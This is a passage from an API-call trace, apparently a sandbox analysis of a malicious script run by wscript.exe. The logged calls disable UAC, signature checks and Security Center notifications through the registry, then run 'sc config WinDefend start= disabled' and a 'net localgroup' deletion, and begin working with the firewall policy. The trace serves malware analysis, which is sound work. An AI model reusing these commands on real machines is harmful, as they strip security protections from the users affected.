returned 0x0 [0226.473] SafeArrayGetUBound (in: psa=0x3ae5c0, nDim=0x1, plUbound=0x25eba0 | out: plUbound=0x25eba0) returned 0x0 [0226.487] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0226.487] CLSIDFromProgID (in: lpszProgID="WScript.Shell", lpclsid=0x25e9d4 | out: lpclsid=0x25e9d4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8))) returned 0x0 [0226.488] CoCreateInstance (in: rclsid=0x25e9d4*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), pUnkOuter=0x0, dwClsContext=0x15, riid=0x81aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e9cc | out: ppv=0x25e9cc*=0x2a447c) returned 0x0 [0226.528] GetVersionExA (in: lpVersionInformation=0x25d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x77252dd6, dwPlatformId=0x3967f8, szCSDVersion="ÈÔ%") | out: lpVersionInformation=0x25d520*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0226.528] GetUserDefaultLCID () returned 0x409 [0226.528] DllGetClassObject (in: rclsid=0x3b7de0*(Data1=0x72c24dd5, Data2=0xd70a, Data3=0x438b, Data4=([0]=0x8a, [1]=0x42, [2]=0x98, [3]=0x42, [4]=0x4b, [5]=0x88, [6]=0xaf, [7]=0xb8)), riid=0x76adee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25dca4 | out: ppv=0x25dca4*=0x2a3788) returned 0x0 [0226.528] WshShell:IClassFactory:CreateInstance (in: This=0x2a3788, pUnkOuter=0x0, riid=0x25e650*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25dc90 | out: ppvObject=0x25dc90*=0x2a447c) returned 0x0 [0226.528] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x25db2c, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\wscript.exe") returned 0x1f [0226.529] lstrlenA (lpString="\\wscript.exe") returned 12 [0226.529] lstrlenA (lpString="C:\\Windows\\System32\\wscript.exe") returned 31 [0226.529] _strcmpi (_Str1="\\wscript.exe", _Str2="\\wscript.exe") returned 0 [0226.529] GetModuleHandleA (lpModuleName=0x0) returned 0x80000 [0226.529] GetProcAddress (hModule=0x80000, lpProcName=0x1) returned 0x82bb9 [0226.529] IUnknown:AddRef (This=0x2a447c) returned 0x2 [0226.529] IUnknown:Release (This=0x2a447c) returned 0x1 [0226.529] WshShell:IUnknown:Release (This=0x2a3788) returned 0x0 [0226.529] IUnknown:QueryInterface (in: This=0x2a447c, riid=0x81aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e984 | out: ppvObject=0x25e984*=0x2a447c) returned 0x0 [0226.529] IUnknown:Release (This=0x2a447c) returned 0x1 [0226.626] LoadRegTypeLib (in: rguid=0x6c4214bc*(Data1=0xf935dc20, Data2=0x1cf0, Data3=0x11d0, Data4=([0]=0xad, [1]=0xb9, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0xd5, [6]=0x8a, [7]=0xb)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x409, pptlib=0x25ebe8*=0x0 | out: pptlib=0x25ebe8*=0x3d0c48) returned 0x0 [0226.632] ITypeLib:GetTypeInfoType (in: This=0x3d0c48, index=0x6c4214cc, pTKind=0x25ebcc | out: pTKind=0x25ebcc*=4007116) returned 0x0 [0226.632] IUnknown:Release (This=0x3d0c48) returned 0x1 [0226.632] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0226.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0226.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x25e860, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_DWORD", lpUsedDefaultChar=0x0) returned 10 [0226.633] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_SZ") returned -1 [0226.633] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_EXPAND_SZ") returned -1 [0226.633] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_DWORD") returned 0 [0226.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0226.633] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", cchWideChar=-1, lpMultiByteStr=0x25e840, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA", lpUsedDefaultChar=0x0) returned 87 [0226.633] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221e8, _MaxCount=0x5) returned 2 [0226.633] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221f0, _MaxCount=0x5) returned -7 [0226.633] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221f8, _MaxCount=0x5) returned 2 [0226.633] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c422200, _MaxCount=0x12) returned 9 [0226.633] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c422214, _MaxCount=0x13) returned 0 [0226.633] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x25e818, lpdwDisposition=0x0 | out: phkResult=0x25e818*=0x170, lpdwDisposition=0x0) returned 0x0 [0226.633] RegSetValueExA (in: hKey=0x170, lpValueName="EnableLUA", Reserved=0x0, dwType=0x4, lpData=0x25e8b0*=0x0, cbData=0x4 | out: lpData=0x25e8b0*=0x0) returned 0x0 [0226.634] RegCloseKey (hKey=0x170) returned 0x0 [0226.869] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0226.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0226.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x25e860, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_DWORD", lpUsedDefaultChar=0x0) returned 10 [0226.869] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_SZ") returned -1 [0226.869] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_EXPAND_SZ") returned -1 [0226.869] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_DWORD") returned 0 [0226.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0226.869] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", cchWideChar=-1, lpMultiByteStr=0x25e830, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\ConsentPromptBehaviorAdmin", lpUsedDefaultChar=0x0) returned 104 [0226.869] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c4221e8, _MaxCount=0x5) returned 2 [0226.869] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c4221f0, _MaxCount=0x5) returned -7 [0226.869] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c4221f8, _MaxCount=0x5) returned 2 [0226.869] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c422200, _MaxCount=0x12) returned 9 [0226.869] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c422214, _MaxCount=0x13) returned 0 [0226.870] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x25e808, lpdwDisposition=0x0 | out: phkResult=0x25e808*=0x170, lpdwDisposition=0x0) returned 0x0 [0226.870] RegSetValueExA (in: hKey=0x170, lpValueName="ConsentPromptBehaviorAdmin", Reserved=0x0, dwType=0x4, lpData=0x25e8b0*=0x0, cbData=0x4 | out: lpData=0x25e8b0*=0x0) returned 0x0 [0226.872] RegCloseKey (hKey=0x170) returned 0x0 [0226.972] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0226.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0226.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x25e860, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_DWORD", lpUsedDefaultChar=0x0) returned 10 [0226.972] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_SZ") returned -1 [0226.972] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_EXPAND_SZ") returned -1 [0226.972] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_DWORD") returned 0 [0226.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 99 [0226.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop", cchWideChar=-1, lpMultiByteStr=0x25e830, cbMultiByte=99, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\PromptOnSecureDesktop", lpUsedDefaultChar=0x0) returned 99 [0226.972] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c4221e8, _MaxCount=0x5) returned 2 [0226.972] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c4221f0, _MaxCount=0x5) returned -7 [0226.972] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c4221f8, _MaxCount=0x5) returned 2 [0226.972] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c422200, _MaxCount=0x12) returned 9 [0226.972] _mbsnbcmp (_Str1=0x25e830, _Str2=0x6c422214, _MaxCount=0x13) returned 0 [0226.972] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x25e808, lpdwDisposition=0x0 | out: phkResult=0x25e808*=0x170, lpdwDisposition=0x0) returned 0x0 [0226.972] RegSetValueExA (in: hKey=0x170, lpValueName="PromptOnSecureDesktop", Reserved=0x0, dwType=0x4, lpData=0x25e8b0*=0x0, cbData=0x4 | out: lpData=0x25e8b0*=0x0) returned 0x0 [0226.975] RegCloseKey (hKey=0x170) returned 0x0 [0227.058] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0227.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Download\\CheckExeSignatures", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83 [0227.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Download\\CheckExeSignatures", cchWideChar=-1, lpMultiByteStr=0x25e840, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Download\\CheckExeSignatures", lpUsedDefaultChar=0x0) returned 83 [0227.058] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221e8, _MaxCount=0x5) returned 2 [0227.058] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221f0, _MaxCount=0x5) returned -7 [0227.058] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221f8, _MaxCount=0x5) returned 2 [0227.058] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c422200, _MaxCount=0x12) returned 0 [0227.058] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Download", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x25e818, lpdwDisposition=0x0 | out: phkResult=0x25e818*=0x170, lpdwDisposition=0x0) returned 0x0 [0227.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="no", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0227.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="no", cchWideChar=-1, lpMultiByteStr=0x25e830, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="no", lpUsedDefaultChar=0x0) returned 3 [0227.058] lstrlenA (lpString="no") returned 2 [0227.058] RegSetValueExA (in: hKey=0x170, lpValueName="CheckExeSignatures", Reserved=0x0, dwType=0x1, lpData="no", cbData=0x3 | out: lpData="no") returned 0x0 [0227.058] RegCloseKey (hKey=0x170) returned 0x0 [0227.144] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0227.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Download\\RunInvalidSignatures", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 85 [0227.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Download\\RunInvalidSignatures", cchWideChar=-1, lpMultiByteStr=0x25e840, cbMultiByte=85, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Download\\RunInvalidSignatures", lpUsedDefaultChar=0x0) returned 85 [0227.145] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221e8, _MaxCount=0x5) returned 2 [0227.145] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221f0, _MaxCount=0x5) returned -7 [0227.145] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c4221f8, _MaxCount=0x5) returned 2 [0227.145] _mbsnbcmp (_Str1=0x25e840, _Str2=0x6c422200, _MaxCount=0x12) returned 0 [0227.145] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Download", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x25e818, lpdwDisposition=0x0 | out: phkResult=0x25e818*=0x170, lpdwDisposition=0x0) returned 0x0 [0227.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="00000001", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0227.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="00000001", cchWideChar=-1, lpMultiByteStr=0x25e830, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="00000001", lpUsedDefaultChar=0x0) returned 9 [0227.145] lstrlenA (lpString="00000001") returned 8 [0227.145] RegSetValueExA (in: hKey=0x170, lpValueName="RunInvalidSignatures", Reserved=0x0, dwType=0x1, lpData="00000001", cbData=0x9 | out: lpData="00000001") returned 0x0 [0227.145] RegCloseKey (hKey=0x170) returned 0x0 [0227.214] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0227.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0227.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x25e860, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_DWORD", lpUsedDefaultChar=0x0) returned 10 [0227.214] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_SZ") returned -1 [0227.215] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_EXPAND_SZ") returned -1 [0227.215] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_DWORD") returned 0 [0227.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKLM\\Software\\Microsoft\\Security Center\\AntiVirusDisableNotify", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 63 [0227.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKLM\\Software\\Microsoft\\Security Center\\AntiVirusDisableNotify", cchWideChar=-1, lpMultiByteStr=0x25e860, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKLM\\Software\\Microsoft\\Security Center\\AntiVirusDisableNotify", lpUsedDefaultChar=0x0) returned 63 [0227.215] _mbsnbcmp (_Str1=0x25e860, _Str2=0x6c4221e8, _MaxCount=0x5) returned 9 [0227.215] _mbsnbcmp (_Str1=0x25e860, _Str2=0x6c4221f0, _MaxCount=0x5) returned 0 [0227.215] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Security Center", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x25e838, lpdwDisposition=0x0 | out: phkResult=0x25e838*=0x170, lpdwDisposition=0x0) returned 0x0 [0227.215] RegSetValueExA (in: hKey=0x170, lpValueName="AntiVirusDisableNotify", Reserved=0x0, dwType=0x4, lpData=0x25e8b0*=0x1, cbData=0x4 | out: lpData=0x25e8b0*=0x1) returned 0x0 [0227.216] RegCloseKey (hKey=0x170) returned 0x0 [0227.313] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0227.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0227.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="REG_DWORD", cchWideChar=-1, lpMultiByteStr=0x25e860, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="REG_DWORD", lpUsedDefaultChar=0x0) returned 10 [0227.313] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_SZ") returned -1 [0227.313] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_EXPAND_SZ") returned -1 [0227.313] lstrcmpA (lpString1="REG_DWORD", lpString2="REG_DWORD") returned 0 [0227.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKLM\\Software\\Microsoft\\Security Center\\UpdatesDisableNotify", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0227.313] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKLM\\Software\\Microsoft\\Security Center\\UpdatesDisableNotify", cchWideChar=-1, lpMultiByteStr=0x25e860, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKLM\\Software\\Microsoft\\Security Center\\UpdatesDisableNotify", lpUsedDefaultChar=0x0) returned 61 [0227.313] _mbsnbcmp (_Str1=0x25e860, _Str2=0x6c4221e8, _MaxCount=0x5) returned 9 [0227.313] _mbsnbcmp (_Str1=0x25e860, _Str2=0x6c4221f0, _MaxCount=0x5) returned 0 [0227.313] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Security Center", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x25e838, lpdwDisposition=0x0 | out: phkResult=0x25e838*=0x170, lpdwDisposition=0x0) returned 0x0 [0227.313] RegSetValueExA (in: hKey=0x170, lpValueName="UpdatesDisableNotify", Reserved=0x0, dwType=0x4, lpData=0x25e8b0*=0x1, cbData=0x4 | out: lpData=0x25e8b0*=0x1) returned 0x0 [0227.314] RegCloseKey (hKey=0x170) returned 0x0 [0227.351] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0227.351] ExpandEnvironmentStringsW (in: lpSrc="sc config WinDefend start= disabled", lpDst=0x25e08c, nSize=0x400 | out: lpDst="sc config WinDefend start= disabled") returned 0x24 [0227.351] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x759e0000 [0227.354] GetProcAddress (hModule=0x759e0000, lpProcName="ShellExecuteExW") returned 0x75a01e46 [0227.354] ShellExecuteExW (in: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="sc", lpParameters="config WinDefend start= disabled", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="sc", lpParameters="config WinDefend start= disabled", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0227.753] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0227.753] ExpandEnvironmentStringsW (in: lpSrc="net localgroup HomeUsers /delete DSsDPMx042", lpDst=0x25e08c, nSize=0x400 | out: lpDst="net localgroup HomeUsers /delete DSsDPMx042") returned 0x2c [0227.753] ShellExecuteExW (in: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="net", lpParameters="localgroup HomeUsers /delete DSsDPMx042", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x25e858*(cbSize=0x3c, fMask=0x400, hwnd=0x0, lpVerb="Open", lpFile="net", lpParameters="localgroup HomeUsers /delete DSsDPMx042", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0227.990] GetCurrentThreadId () returned 0x8c0 [0227.990] GetCurrentThreadId () returned 0x8c0 [0227.990] GetCurrentThreadId () returned 0x8c0 [0227.990] GetCurrentThreadId () returned 0x8c0 [0228.087] CLSIDFromProgIDEx (in: lpszProgID="HNetCfg.FwPolicy2", lpclsid=0x25e9c8 | out: lpclsid=0x25e9c8*(Data1=0xe2b3c97f, Data2=0x6ae1, Data3=0x41ac, Data4=([0]=0x81, [1]=0x7a, [2]=0xf6, [3]=0xf9, [4]=0x21, [5]=0x66, [6]=0xd7, [7]=0xdd))) returned 0x0 [0228.088] SysStringLen (param_1=0x0) returned 0x0 [0228.088] CoGetClassObject (in: rclsid=0x25e9c8*(Data1=0xe2b3c97f, Data2=0x6ae1, Data3=0x41ac, Data4=([0]=0x81, [1]=0x7a, [2]=0xf6, [3]=0xf9, [4]=0x21, [5]=0x66, [6]=0xd7, [7]=0xdd)), dwClsContext=0x15, pvReserved=0x0, riid=0x6c4c4174*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x25e9b8 | out: ppv=0x25e9b8*=0x187ce68) returned 0x0 [0228.094] NetFwPolicy2:IUnknown:QueryInterface (in: This=0x187ce68, riid=0x6c4d1100*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x25e9b4 | out: ppvObject=0x25e9b4*=0x0) returned 0x80004002 [0228.094] NetFwPolicy2:IClassFactory:CreateInstance (in: This=0x187ce68, pUnkOuter=0x0, riid=0x6c4c40a0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e9bc | out: ppvObject=0x25e9bc*=0x187ce98) returned 0x0 [0228.094] NetFwPolicy2:IUnknown:Release (This=0x187ce68) returned 0x1 [0228.094] IUnknown:QueryInterface (in: This=0x187ce98, riid=0x6c4d0580*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x25e980 | out: ppvObject=0x25e980*=0x0) returned 0x80004002 [0228.094] IUnknown:QueryInterface (in: This=0x187ce98, riid=0x6c4c4140*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x25e970 | out: ppvObject=0x25e970*=0x187ce98) returned 0x0 